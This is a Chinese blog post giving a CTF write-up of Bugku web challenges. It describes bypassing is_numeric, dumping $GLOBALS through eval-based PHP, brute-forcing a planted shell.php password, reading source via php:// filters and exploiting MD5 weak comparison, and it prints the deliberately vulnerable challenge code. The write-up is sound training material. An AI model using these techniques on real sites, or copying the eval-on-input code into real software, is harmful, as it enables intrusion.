<!DOCTYPE html>



  


<script type="text/javascript" color="122,122,255" opacity="0.5" zindex="-2" count="99" src="//cdn.bootcss.com/canvas-nest.js/1.0.0/canvas-nest.min.js"></script>



<html class="theme-next muse use-motion" lang="zh-Hans">
<head><meta name="generator" content="Hexo 3.8.0">
  <meta charset="UTF-8">
<meta http-equiv="X-UA-Compatible" content="IE=edge">
<meta name="viewport" content="width=device-width, initial-scale=1, maximum-scale=1">
<meta name="theme-color" content="#222">









<meta http-equiv="Cache-Control" content="no-transform">
<meta http-equiv="Cache-Control" content="no-siteapp">
















  
  
  <link href="/lib/fancybox/source/jquery.fancybox.css?v=2.1.5" rel="stylesheet" type="text/css">







<link href="/lib/font-awesome/css/font-awesome.min.css?v=4.6.2" rel="stylesheet" type="text/css">

<link href="/css/main.css?v=5.1.4" rel="stylesheet" type="text/css">


  <link rel="apple-touch-icon" sizes="180x180" href="/images/apple-touch-icon-next.png?v=5.1.4">


  <link rel="icon" type="image/png" sizes="32x32" href="/images/favicon-32x32-next.png?v=5.1.4">


  <link rel="icon" type="image/png" sizes="16x16" href="/images/favicon-16x16-next.png?v=5.1.4">


  <link rel="mask-icon" href="/images/logo.svg?v=5.1.4" color="#222">





  <meta name="keywords" content="CTF,">










<meta name="description" content="最开始做CTF是从bugku开始的，现在抽空总结一下。接下来还会总结一些之前做过的题目，加深一下印象 web2直接查看源码，得到flag 计算器查看源码，改源码中的最大输入长度，输入正确结果，得到flag web基础$_GET web基础$_POST这里用到了post的方法，我安装的是火狐浏览器的hackbar插件。 矛盾源码如下1234567$num=$_GET[&amp;apos;num&amp;apos;]">
<meta name="keywords" content="CTF">
<meta property="og:type" content="article">
<meta property="og:title" content="bugCTF-web方向wp">
<meta property="og:url" content="http://yoursite.com/2018/10/18/bugku/index.html">
<meta property="og:site_name" content="Bling_Dog">
<meta property="og:description" content="最开始做CTF是从bugku开始的，现在抽空总结一下。接下来还会总结一些之前做过的题目，加深一下印象 web2直接查看源码，得到flag 计算器查看源码，改源码中的最大输入长度，输入正确结果，得到flag web基础$_GET web基础$_POST这里用到了post的方法，我安装的是火狐浏览器的hackbar插件。 矛盾源码如下1234567$num=$_GET[&amp;apos;num&amp;apos;]">
<meta property="og:locale" content="zh-Hans">
<meta property="og:image" content="https://upload-images.jianshu.io/upload_images/11234137-eb1b160e026da0bf.png?imageMogr2/auto-orient/strip%7CimageView2/2/w/1240">
<meta property="og:image" content="https://upload-images.jianshu.io/upload_images/11234137-8eb14130381c7681.png?imageMogr2/auto-orient/strip%7CimageView2/2/w/1240">
<meta property="og:image" content="https://upload-images.jianshu.io/upload_images/11234137-e68e3b432826500c.png?imageMogr2/auto-orient/strip%7CimageView2/2/w/1240">
<meta property="og:image" content="https://upload-images.jianshu.io/upload_images/11234137-09fc3cfc3759c9fa.png?imageMogr2/auto-orient/strip%7CimageView2/2/w/1240">
<meta property="og:image" content="https://upload-images.jianshu.io/upload_images/11234137-0525120284827be9.png?imageMogr2/auto-orient/strip%7CimageView2/2/w/1240">
<meta property="og:image" content="https://upload-images.jianshu.io/upload_images/11234137-9eba139263403d76.png?imageMogr2/auto-orient/strip%7CimageView2/2/w/1240">
<meta property="og:image" content="https://upload-images.jianshu.io/upload_images/11234137-124ad82774399355.png?imageMogr2/auto-orient/strip%7CimageView2/2/w/1240">
<meta property="og:image" content="https://upload-images.jianshu.io/upload_images/11234137-7d5e551254beed4a.png?imageMogr2/auto-orient/strip%7CimageView2/2/w/1240">
<meta property="og:image" content="https://upload-images.jianshu.io/upload_images/11234137-5bec2a18b377d597.png?imageMogr2/auto-orient/strip%7CimageView2/2/w/1240">
<meta property="og:image" content="https://upload-images.jianshu.io/upload_images/11234137-fb12cebfd7329df3.png?imageMogr2/auto-orient/strip%7CimageView2/2/w/1240">
<meta property="og:image" content="https://upload-images.jianshu.io/upload_images/11234137-47c7448154409313.png?imageMogr2/auto-orient/strip%7CimageView2/2/w/1240">
<meta property="og:image" content="https://upload-images.jianshu.io/upload_images/11234137-161dfb48dca84232.png?imageMogr2/auto-orient/strip%7CimageView2/2/w/1240">
<meta property="og:image" content="https://upload-images.jianshu.io/upload_images/11234137-3f3a56849432cae0.png?imageMogr2/auto-orient/strip%7CimageView2/2/w/1240">
<meta property="og:image" content="https://upload-images.jianshu.io/upload_images/11234137-8099357b397598bf.png?imageMogr2/auto-orient/strip%7CimageView2/2/w/1240">
<meta property="og:image" content="https://upload-images.jianshu.io/upload_images/11234137-95ca72ac80314ed7.png?imageMogr2/auto-orient/strip%7CimageView2/2/w/1240">
<meta property="og:image" content="https://upload-images.jianshu.io/upload_images/11234137-d9345de87e90e5ac.png?imageMogr2/auto-orient/strip%7CimageView2/2/w/1240">
<meta property="og:image" content="https://upload-images.jianshu.io/upload_images/11234137-e54dee9c9891fd8e.png?imageMogr2/auto-orient/strip%7CimageView2/2/w/1240">
<meta property="og:image" content="https://upload-images.jianshu.io/upload_images/11234137-735dc7d835d299a9.png?imageMogr2/auto-orient/strip%7CimageView2/2/w/1240">
<meta property="og:image" content="https://upload-images.jianshu.io/upload_images/11234137-f11f123b0ec51533.png?imageMogr2/auto-orient/strip%7CimageView2/2/w/1240">
<meta property="og:image" content="https://upload-images.jianshu.io/upload_images/11234137-f3115a624a7363dc.png?imageMogr2/auto-orient/strip%7CimageView2/2/w/1240">
<meta property="og:image" content="https://upload-images.jianshu.io/upload_images/11234137-91916994bc091256.png?imageMogr2/auto-orient/strip%7CimageView2/2/w/1240">
<meta property="og:image" content="https://upload-images.jianshu.io/upload_images/11234137-4a1a8e2f720af7ad.png?imageMogr2/auto-orient/strip%7CimageView2/2/w/1240">
<meta property="og:image" content="https://upload-images.jianshu.io/upload_images/11234137-c3877d609c964dd2.png?imageMogr2/auto-orient/strip%7CimageView2/2/w/1240">
<meta property="og:image" content="https://upload-images.jianshu.io/upload_images/11234137-18e0e485f1291f79.png?imageMogr2/auto-orient/strip%7CimageView2/2/w/1240">
<meta property="og:image" content="https://upload-images.jianshu.io/upload_images/11234137-57bba2f53084119d.png?imageMogr2/auto-orient/strip%7CimageView2/2/w/1240">
<meta property="og:image" content="https://upload-images.jianshu.io/upload_images/11234137-cd097f9e2378878e.png?imageMogr2/auto-orient/strip%7CimageView2/2/w/1240">
<meta property="og:image" content="https://upload-images.jianshu.io/upload_images/11234137-bfbb506a21181813.png?imageMogr2/auto-orient/strip%7CimageView2/2/w/1240">
<meta property="og:image" content="https://upload-images.jianshu.io/upload_images/11234137-5155aeaf27506aeb.png?imageMogr2/auto-orient/strip%7CimageView2/2/w/1240">
<meta property="og:image" content="https://upload-images.jianshu.io/upload_images/11234137-296d2707e7656ebc.png?imageMogr2/auto-orient/strip%7CimageView2/2/w/1240">
<meta property="og:image" content="https://upload-images.jianshu.io/upload_images/11234137-b86a6ed0c8f956ea.png?imageMogr2/auto-orient/strip%7CimageView2/2/w/1240">
<meta property="og:image" content="https://upload-images.jianshu.io/upload_images/11234137-039a56cd52fbada2.png?imageMogr2/auto-orient/strip%7CimageView2/2/w/1240">
<meta property="og:image" content="https://upload-images.jianshu.io/upload_images/11234137-e83ac76e2c249ef2.png?imageMogr2/auto-orient/strip%7CimageView2/2/w/1240">
<meta property="og:image" content="https://upload-images.jianshu.io/upload_images/11234137-2aac7937558a8b42.png?imageMogr2/auto-orient/strip%7CimageView2/2/w/1240">
<meta property="og:image" content="https://upload-images.jianshu.io/upload_images/11234137-cf668c97ea017184.png?imageMogr2/auto-orient/strip%7CimageView2/2/w/1240">
<meta property="og:image" content="https://upload-images.jianshu.io/upload_images/11234137-e83b4bfe89c481a5.png?imageMogr2/auto-orient/strip%7CimageView2/2/w/1240">
<meta property="og:image" content="https://upload-images.jianshu.io/upload_images/11234137-a1b27af7c47ef7df.png?imageMogr2/auto-orient/strip%7CimageView2/2/w/1240">
<meta property="og:image" content="https://upload-images.jianshu.io/upload_images/11234137-8a274064f70ee2fd.png?imageMogr2/auto-orient/strip%7CimageView2/2/w/1240">
<meta property="og:image" content="https://upload-images.jianshu.io/upload_images/11234137-1ec5f7db92379690.png?imageMogr2/auto-orient/strip%7CimageView2/2/w/1240">
<meta property="og:image" content="https://upload-images.jianshu.io/upload_images/11234137-1d972c6fc9fb99d3.png?imageMogr2/auto-orient/strip%7CimageView2/2/w/1240">
<meta property="og:image" content="https://upload-images.jianshu.io/upload_images/11234137-d70d821f70282b2f.png?imageMogr2/auto-orient/strip%7CimageView2/2/w/1240">
<meta property="og:image" content="https://upload-images.jianshu.io/upload_images/11234137-4316d5f3fb167d45.png?imageMogr2/auto-orient/strip%7CimageView2/2/w/1240">
<meta property="og:image" content="https://upload-images.jianshu.io/upload_images/11234137-275197b799096777.png?imageMogr2/auto-orient/strip%7CimageView2/2/w/1240">
<meta property="og:image" content="https://upload-images.jianshu.io/upload_images/11234137-4ad7dcf788571465.png?imageMogr2/auto-orient/strip%7CimageView2/2/w/1240">
<meta property="og:image" content="https://upload-images.jianshu.io/upload_images/11234137-ac7fbf09adc2e5ec.png?imageMogr2/auto-orient/strip%7CimageView2/2/w/1240">
<meta property="og:image" content="https://upload-images.jianshu.io/upload_images/11234137-ba597882aafe5056.png?imageMogr2/auto-orient/strip%7CimageView2/2/w/1240">
<meta property="og:image" content="https://upload-images.jianshu.io/upload_images/11234137-e863736395d9a0bc.png?imageMogr2/auto-orient/strip%7CimageView2/2/w/1240">
<meta property="og:image" content="https://upload-images.jianshu.io/upload_images/11234137-51abac3a99e17ec7.png?imageMogr2/auto-orient/strip%7CimageView2/2/w/1240">
<meta property="og:image" content="https://upload-images.jianshu.io/upload_images/11234137-4b42deaa531ed4a7.png?imageMogr2/auto-orient/strip%7CimageView2/2/w/1240">
<meta property="og:image" content="https://upload-images.jianshu.io/upload_images/11234137-aa0a030bcc70b673.png?imageMogr2/auto-orient/strip%7CimageView2/2/w/1240">
<meta property="og:updated_time" content="2018-10-20T08:41:06.000Z">
<meta name="twitter:card" content="summary">
<meta name="twitter:title" content="bugCTF-web方向wp">
<meta name="twitter:description" content="最开始做CTF是从bugku开始的，现在抽空总结一下。接下来还会总结一些之前做过的题目，加深一下印象 web2直接查看源码，得到flag 计算器查看源码，改源码中的最大输入长度，输入正确结果，得到flag web基础$_GET web基础$_POST这里用到了post的方法，我安装的是火狐浏览器的hackbar插件。 矛盾源码如下1234567$num=$_GET[&amp;apos;num&amp;apos;]">
<meta name="twitter:image" content="https://upload-images.jianshu.io/upload_images/11234137-eb1b160e026da0bf.png?imageMogr2/auto-orient/strip%7CimageView2/2/w/1240">



<script type="text/javascript" id="hexo.configurations">
  var NexT = window.NexT || {};
  var CONFIG = {
    root: '/',
    scheme: 'Muse',
    version: '5.1.4',
    sidebar: {"position":"left","display":"post","offset":12,"b2t":false,"scrollpercent":false,"onmobile":false},
    fancybox: true,
    tabs: true,
    motion: {"enable":true,"async":false,"transition":{"post_block":"fadeIn","post_header":"slideDownIn","post_body":"slideDownIn","coll_header":"slideLeftIn","sidebar":"slideUpIn"}},
    duoshuo: {
      userId: '0',
      author: '博主'
    },
    algolia: {
      applicationID: '',
      apiKey: '',
      indexName: '',
      hits: {"per_page":10},
      labels: {"input_placeholder":"Search for Posts","hits_empty":"We didn't find any results for the search: ${query}","hits_stats":"${hits} results found in ${time} ms"}
    }
  };
</script>



  <link rel="canonical" href="http://yoursite.com/2018/10/18/bugku/">





  <title>bugCTF-web方向wp | Bling_Dog</title>
  








</head>

<body itemscope itemtype="http://schema.org/WebPage" lang="zh-Hans">

  
  
    
  

  <div class="container sidebar-position-left page-post-detail">
    <div class="headband"></div>

    <header id="header" class="header" itemscope itemtype="http://schema.org/WPHeader">
      <div class="header-inner"><div class="site-brand-wrapper">
  <div class="site-meta ">
    

    <div class="custom-logo-site-title">
      <a href="/" class="brand" rel="start">
        <span class="logo-line-before"><i></i></span>
        <span class="site-title">Bling_Dog</span>
        <span class="logo-line-after"><i></i></span>
      </a>
    </div>
      
        <p class="site-subtitle">奔向大佬路上的小白</p>
      
  </div>

  <div class="site-nav-toggle">
    <button>
      <span class="btn-bar"></span>
      <span class="btn-bar"></span>
      <span class="btn-bar"></span>
    </button>
  </div>
</div>

<nav class="site-nav">
  

  
    <ul id="menu" class="menu">
      
        
        <li class="menu-item menu-item-home">
          <a href="/" rel="section">
            
              <i class="menu-item-icon fa fa-fw fa-question-circle"></i> <br>
            
            首页
          </a>
        </li>
      
        
        <li class="menu-item menu-item-archives">
          <a href="/archives" rel="section">
            
              <i class="menu-item-icon fa fa-fw fa-question-circle"></i> <br>
            
            归档
          </a>
        </li>
      
        
        <li class="menu-item menu-item-tags">
          <a href="/tags" rel="section">
            
              <i class="menu-item-icon fa fa-fw fa-question-circle"></i> <br>
            
            标签
          </a>
        </li>
      
        
        <li class="menu-item menu-item-about">
          <a href="/about" rel="section">
            
              <i class="menu-item-icon fa fa-fw fa-question-circle"></i> <br>
            
            关于
          </a>
        </li>
      
        
        <li class="menu-item menu-item-categories">
          <a href="/categories" rel="section">
            
              <i class="menu-item-icon fa fa-fw fa-question-circle"></i> <br>
            
            分类
          </a>
        </li>
      

      
    </ul>
  

  
</nav>



 </div>
    </header>

    <main id="main" class="main">
      <div class="main-inner">
        <div class="content-wrap">
          <div id="content" class="content">
            

  <div id="posts" class="posts-expand">
    

  

  
  
  

  <article class="post post-type-normal" itemscope itemtype="http://schema.org/Article">
  
  
  
  <div class="post-block">
    <link itemprop="mainEntityOfPage" href="http://yoursite.com/2018/10/18/bugku/">

    <span hidden itemprop="author" itemscope itemtype="http://schema.org/Person">
      <meta itemprop="name" content="Bling_Dog">
      <meta itemprop="description" content>
      <meta itemprop="image" content="https://upload-images.jianshu.io/upload_images/11234137-b2b20e005c98464d.png?imageMogr2/auto-orient/strip%7CimageView2/2/w/1240">
    </span>

    <span hidden itemprop="publisher" itemscope itemtype="http://schema.org/Organization">
      <meta itemprop="name" content="Bling_Dog">
    </span>

    
      <header class="post-header">

        
        
          <h1 class="post-title" itemprop="name headline">bugCTF-web方向wp</h1>
        

        <div class="post-meta">
          <span class="post-time">
            
              <span class="post-meta-item-icon">
                <i class="fa fa-calendar-o"></i>
              </span>
              
                <span class="post-meta-item-text">发表于</span>
              
              <time title="创建于" itemprop="dateCreated datePublished" datetime="2018-10-18T20:20:20+08:00">
                2018-10-18
              </time>
            

            

            
          </span>

          

          
            
          

          
          

          

          

          

        </div>
      </header>
    

    
    
    
    <div class="post-body" itemprop="articleBody">

      
      

      
        <p>最开始做CTF是从bugku开始的，现在抽空总结一下。接下来还会总结一些之前做过的题目，加深一下印象</p>
<h1 id="web2"><a href="#web2" class="headerlink" title="web2"></a>web2</h1><p>直接查看源码，得到flag<br><img src="https://upload-images.jianshu.io/upload_images/11234137-eb1b160e026da0bf.png?imageMogr2/auto-orient/strip%7CimageView2/2/w/1240" alt="https://upload-images.jianshu.io/upload_images/11234137-eb1b160e026da0bf.png?imageMogr2/auto-orient/strip%7CimageView2/2/w/1240"></p>
<h1 id="计算器"><a href="#计算器" class="headerlink" title="计算器"></a>计算器</h1><p>查看源码，改源码中的最大输入长度，输入正确结果，得到flag<br><img src="https://upload-images.jianshu.io/upload_images/11234137-8eb14130381c7681.png?imageMogr2/auto-orient/strip%7CimageView2/2/w/1240" alt="https://upload-images.jianshu.io/upload_images/11234137-8eb14130381c7681.png?imageMogr2/auto-orient/strip%7CimageView2/2/w/1240"></p>
<h1 id="web基础-GET"><a href="#web基础-GET" class="headerlink" title="web基础$_GET"></a>web基础$_GET</h1><p><img src="https://upload-images.jianshu.io/upload_images/11234137-e68e3b432826500c.png?imageMogr2/auto-orient/strip%7CimageView2/2/w/1240" alt="https://upload-images.jianshu.io/upload_images/11234137-e68e3b432826500c.png?imageMogr2/auto-orient/strip%7CimageView2/2/w/1240"></p>
<h1 id="web基础-POST"><a href="#web基础-POST" class="headerlink" title="web基础$_POST"></a>web基础$_POST</h1><p>这里用到了post的方法，我安装的是火狐浏览器的hackbar插件。<br><img src="https://upload-images.jianshu.io/upload_images/11234137-09fc3cfc3759c9fa.png?imageMogr2/auto-orient/strip%7CimageView2/2/w/1240" alt="https://upload-images.jianshu.io/upload_images/11234137-09fc3cfc3759c9fa.png?imageMogr2/auto-orient/strip%7CimageView2/2/w/1240"></p>
<h1 id="矛盾"><a href="#矛盾" class="headerlink" title="矛盾"></a>矛盾</h1><p>源码如下<br><figure class="highlight plain"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br></pre></td><td class="code"><pre><span class="line">$num=$_GET[&apos;num&apos;];</span><br><span class="line">if(!is_numeric($num))</span><br><span class="line">&#123;</span><br><span class="line">echo $num;</span><br><span class="line">if($num==1)</span><br><span class="line">echo &apos;flag&#123;**********&#125;&apos;;</span><br><span class="line">&#125;</span><br></pre></td></tr></table></figure></p>
<p>一般矛盾的题目都应该考虑到判断函数自身的漏洞，本题中is_numeric函数是判断变量是否是数字或者数字字符串，不仅检查10进制，16进制也可以.<br>is_numeric()对于空字符%00,不论%00放在数字前后，都会返回false,对于%20,只有放在数字后才会返回false.<br>所以本题有两种绕过方法</p>
<h2 id="方法1"><a href="#方法1" class="headerlink" title="方法1"></a>方法1</h2><p><img src="https://upload-images.jianshu.io/upload_images/11234137-0525120284827be9.png?imageMogr2/auto-orient/strip%7CimageView2/2/w/1240" alt="https://upload-images.jianshu.io/upload_images/11234137-0525120284827be9.png?imageMogr2/auto-orient/strip%7CimageView2/2/w/1240"></p>
<h2 id="方法2"><a href="#方法2" class="headerlink" title="方法2"></a>方法2</h2><p><img src="https://upload-images.jianshu.io/upload_images/11234137-9eba139263403d76.png?imageMogr2/auto-orient/strip%7CimageView2/2/w/1240" alt="https://upload-images.jianshu.io/upload_images/11234137-9eba139263403d76.png?imageMogr2/auto-orient/strip%7CimageView2/2/w/1240"></p>
<h1 id="web3"><a href="#web3" class="headerlink" title="web3"></a>web3</h1><p>进来之后一直是alert弹框，直接选择跳过，看源码，找到有用信息，然后进行Unicode解码就ok<br><img src="https://upload-images.jianshu.io/upload_images/11234137-124ad82774399355.png?imageMogr2/auto-orient/strip%7CimageView2/2/w/1240" alt="https://upload-images.jianshu.io/upload_images/11234137-124ad82774399355.png?imageMogr2/auto-orient/strip%7CimageView2/2/w/1240"><br><img src="https://upload-images.jianshu.io/upload_images/11234137-7d5e551254beed4a.png?imageMogr2/auto-orient/strip%7CimageView2/2/w/1240" alt="https://upload-images.jianshu.io/upload_images/11234137-7d5e551254beed4a.png?imageMogr2/auto-orient/strip%7CimageView2/2/w/1240"></p>
<h1 id="你必须让他停下"><a href="#你必须让他停下" class="headerlink" title="你必须让他停下"></a>你必须让他停下</h1><p>本题中页面一直在刷新，结合题目名称“你必须让他停下来”，我们用burpsuite抓包，发现返回包中的图片是1.jpg-15.jpg，所以一直点击GO，当图片为10.jpg时候，有可能出现flag。<br><img src="https://upload-images.jianshu.io/upload_images/11234137-5bec2a18b377d597.png?imageMogr2/auto-orient/strip%7CimageView2/2/w/1240" alt="https://upload-images.jianshu.io/upload_images/11234137-5bec2a18b377d597.png?imageMogr2/auto-orient/strip%7CimageView2/2/w/1240"></p>
<h1 id="本地包含"><a href="#本地包含" class="headerlink" title="本地包含"></a>本地包含</h1><p>源码如下：<br><figure class="highlight plain"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br></pre></td><td class="code"><pre><span class="line"> &lt;?php</span><br><span class="line">    include &quot;flag.php&quot;;</span><br><span class="line">    $a = @$_REQUEST[&apos;hello&apos;];</span><br><span class="line">    eval( &quot;var_dump($a);&quot;);</span><br><span class="line">    show_source(__FILE__);</span><br><span class="line">?&gt;</span><br></pre></td></tr></table></figure></p>
<p>一看第三行是把$a的信息输出，我想到使用超级变量$GLOBALS，当var_dump($GLOBALS)时候，会把所有的变量都输出出来，即可看到flag的值。<br><img src="https://upload-images.jianshu.io/upload_images/11234137-fb12cebfd7329df3.png?imageMogr2/auto-orient/strip%7CimageView2/2/w/1240" alt="https://upload-images.jianshu.io/upload_images/11234137-fb12cebfd7329df3.png?imageMogr2/auto-orient/strip%7CimageView2/2/w/1240"></p>
<h1 id="变量1"><a href="#变量1" class="headerlink" title="变量1"></a>变量1</h1><p>本题也是利用了全局变量$GLOBALS,先看题目给出的源代码。<br><figure class="highlight plain"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br></pre></td><td class="code"><pre><span class="line">&lt;?php  </span><br><span class="line">error_reporting(0);</span><br><span class="line">include &quot;flag1.php&quot;;</span><br><span class="line">highlight_file(__file__);</span><br><span class="line">if(isset($_GET[&apos;args&apos;]))&#123;</span><br><span class="line">    $args = $_GET[&apos;args&apos;];</span><br><span class="line">    if(!preg_match(&quot;/^\w+$/&quot;,$args))&#123;</span><br><span class="line">        die(&quot;args error!&quot;);</span><br><span class="line">    &#125;</span><br><span class="line">    eval(&quot;var_dump($$args);&quot;);</span><br><span class="line">&#125;</span><br><span class="line">?&gt;</span><br></pre></td></tr></table></figure></p>
<p>发现了 eval(“var_dump($$args);”); ，所以先试了一下args=flag，发现没有啥回显。然后想到了用$GLOBALS，输出所有的变量内容。发现了flag，原来flag所在的变量名字不是$flag,而是在$ZFkwe3变量中存储的。<br><img src="https://upload-images.jianshu.io/upload_images/11234137-47c7448154409313.png?imageMogr2/auto-orient/strip%7CimageView2/2/w/1240" alt="https://upload-images.jianshu.io/upload_images/11234137-47c7448154409313.png?imageMogr2/auto-orient/strip%7CimageView2/2/w/1240"></p>
<h1 id="web5"><a href="#web5" class="headerlink" title="web5"></a>web5</h1><p>查看源码，发现了一串( ) [ ] + !字符组成的字符串，想到了jsfuck编码，直接复制这串字符到chorme的控制台，输出结果。<br><img src="https://upload-images.jianshu.io/upload_images/11234137-161dfb48dca84232.png?imageMogr2/auto-orient/strip%7CimageView2/2/w/1240" alt="https://upload-images.jianshu.io/upload_images/11234137-161dfb48dca84232.png?imageMogr2/auto-orient/strip%7CimageView2/2/w/1240"></p>
<h1 id="头等舱"><a href="#头等舱" class="headerlink" title="头等舱"></a>头等舱</h1><p>打开网站发现提示什么也没有，根据题目“头等舱”提示，应该是抓包，查看头部。然后burpsuite抓包，查看头部，得到flag<br><img src="https://upload-images.jianshu.io/upload_images/11234137-3f3a56849432cae0.png?imageMogr2/auto-orient/strip%7CimageView2/2/w/1240" alt="https://upload-images.jianshu.io/upload_images/11234137-3f3a56849432cae0.png?imageMogr2/auto-orient/strip%7CimageView2/2/w/1240"></p>
<h1 id="网站被黑"><a href="#网站被黑" class="headerlink" title="网站被黑"></a>网站被黑</h1><p>查看源码没有得到什么有效信息，burpsuite抓包也没有得到什么。于是挂御剑扫描一下后台文件，发现扫出来一个shell.php<br><img src="https://upload-images.jianshu.io/upload_images/11234137-8099357b397598bf.png?imageMogr2/auto-orient/strip%7CimageView2/2/w/1240" alt="https://upload-images.jianshu.io/upload_images/11234137-8099357b397598bf.png?imageMogr2/auto-orient/strip%7CimageView2/2/w/1240"><br>登陆之后发现要一个密码。<br><img src="https://upload-images.jianshu.io/upload_images/11234137-95ca72ac80314ed7.png?imageMogr2/auto-orient/strip%7CimageView2/2/w/1240" alt="https://upload-images.jianshu.io/upload_images/11234137-95ca72ac80314ed7.png?imageMogr2/auto-orient/strip%7CimageView2/2/w/1240"><br>burpsuite爆破一下试试，最终经过了很长时间(电脑性能不好)，爆破出来了。<br><img src="https://upload-images.jianshu.io/upload_images/11234137-d9345de87e90e5ac.png?imageMogr2/auto-orient/strip%7CimageView2/2/w/1240" alt="https://upload-images.jianshu.io/upload_images/11234137-d9345de87e90e5ac.png?imageMogr2/auto-orient/strip%7CimageView2/2/w/1240"><br>然后输入密码，得到flag</p>
<h1 id="web4"><a href="#web4" class="headerlink" title="web4"></a>web4</h1><p>登陆之后查看源码，发现一段js代码。<br><img src="https://upload-images.jianshu.io/upload_images/11234137-e54dee9c9891fd8e.png?imageMogr2/auto-orient/strip%7CimageView2/2/w/1240" alt="https://upload-images.jianshu.io/upload_images/11234137-e54dee9c9891fd8e.png?imageMogr2/auto-orient/strip%7CimageView2/2/w/1240"><br>然后扔到网站进行url解码。将结果输入之后，得到flag<br><img src="https://upload-images.jianshu.io/upload_images/11234137-735dc7d835d299a9.png?imageMogr2/auto-orient/strip%7CimageView2/2/w/1240" alt="https://upload-images.jianshu.io/upload_images/11234137-735dc7d835d299a9.png?imageMogr2/auto-orient/strip%7CimageView2/2/w/1240"></p>
<h1 id="flag在index里面"><a href="#flag在index里面" class="headerlink" title="flag在index里面"></a>flag在index里面</h1><p>这道题做过很多次，但是每次都会忘记套路(应该进行深刻的反思，主要原因是自己对php的一些伪协议不够明白)<br>刚开始各种查源码，抓包，扫后台文件，发现啥也没扫到，最后看的别人的wp，等写完这一片wp，一定好好总结一下php的一些伪协议(难过)<br>解题思路来自<a href="https://blog.csdn.net/zpy1998zpy/article/details/80585443" target="_blank" rel="noopener">孤鸿影~</a><br>使用php://协议<br><img src="https://upload-images.jianshu.io/upload_images/11234137-f11f123b0ec51533.png?imageMogr2/auto-orient/strip%7CimageView2/2/w/1240" alt="https://upload-images.jianshu.io/upload_images/11234137-f11f123b0ec51533.png?imageMogr2/auto-orient/strip%7CimageView2/2/w/1240"><br>将读出来的东西进行base-64解码<br><img src="https://upload-images.jianshu.io/upload_images/11234137-f3115a624a7363dc.png?imageMogr2/auto-orient/strip%7CimageView2/2/w/1240" alt="https://upload-images.jianshu.io/upload_images/11234137-f3115a624a7363dc.png?imageMogr2/auto-orient/strip%7CimageView2/2/w/1240"></p>
<h1 id="输入密码查看flag"><a href="#输入密码查看flag" class="headerlink" title="输入密码查看flag"></a>输入密码查看flag</h1><p>题目提示要爆破，然后burpsuite抓包，爆破，得到flag<br><img src="https://upload-images.jianshu.io/upload_images/11234137-91916994bc091256.png?imageMogr2/auto-orient/strip%7CimageView2/2/w/1240" alt="https://upload-images.jianshu.io/upload_images/11234137-91916994bc091256.png?imageMogr2/auto-orient/strip%7CimageView2/2/w/1240"></p>
<h1 id="点击一百万次"><a href="#点击一百万次" class="headerlink" title="点击一百万次"></a>点击一百万次</h1><p>hackbar进行post提交clicks=1000000即可<br><img src="https://upload-images.jianshu.io/upload_images/11234137-4a1a8e2f720af7ad.png?imageMogr2/auto-orient/strip%7CimageView2/2/w/1240" alt="https://upload-images.jianshu.io/upload_images/11234137-4a1a8e2f720af7ad.png?imageMogr2/auto-orient/strip%7CimageView2/2/w/1240"></p>
<h1 id="备份是个好习惯"><a href="#备份是个好习惯" class="headerlink" title="备份是个好习惯"></a>备份是个好习惯</h1><p>感觉从这道题开始，题目变得有点意思了。先用御剑扫描了一下后台，发现了一个index.php.bak文件<br><img src="https://upload-images.jianshu.io/upload_images/11234137-c3877d609c964dd2.png?imageMogr2/auto-orient/strip%7CimageView2/2/w/1240" alt="https://upload-images.jianshu.io/upload_images/11234137-c3877d609c964dd2.png?imageMogr2/auto-orient/strip%7CimageView2/2/w/1240"><br>下载之后查看源码如下<br><figure class="highlight plain"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br><span class="line">16</span><br><span class="line">17</span><br><span class="line">18</span><br><span class="line">19</span><br><span class="line">20</span><br><span class="line">21</span><br></pre></td><td class="code"><pre><span class="line">&lt;?php</span><br><span class="line">/**</span><br><span class="line"> * Created by PhpStorm.</span><br><span class="line"> * User: Norse</span><br><span class="line"> * Date: 2017/8/6</span><br><span class="line"> * Time: 20:22</span><br><span class="line">*/</span><br><span class="line"></span><br><span class="line">include_once &quot;flag.php&quot;;</span><br><span class="line">ini_set(&quot;display_errors&quot;, 0);</span><br><span class="line">$str = strstr($_SERVER[&apos;REQUEST_URI&apos;], &apos;?&apos;);</span><br><span class="line">$str = substr($str,1);</span><br><span class="line">$str = str_replace(&apos;key&apos;,&apos;&apos;,$str);</span><br><span class="line">parse_str($str);</span><br><span class="line">echo md5($key1);</span><br><span class="line"></span><br><span class="line">echo md5($key2);</span><br><span class="line">if(md5($key1) == md5($key2) &amp;&amp; $key1 !== $key2)&#123;</span><br><span class="line">    echo $flag.&quot;取得flag&quot;;</span><br><span class="line">&#125;</span><br><span class="line">?&gt;</span><br></pre></td></tr></table></figure></p>
<p>大体的意思是先对str进行替换，然后key1和key2需要md5弱比较相等，值不同。<a href="https://blog.csdn.net/dongyanwen6036/article/details/77658983" target="_blank" rel="noopener">md5弱比较的几个例子</a><br>于是构造paylod，得到flag<br><img src="https://upload-images.jianshu.io/upload_images/11234137-18e0e485f1291f79.png?imageMogr2/auto-orient/strip%7CimageView2/2/w/1240" alt="https://upload-images.jianshu.io/upload_images/11234137-18e0e485f1291f79.png?imageMogr2/auto-orient/strip%7CimageView2/2/w/1240"></p>
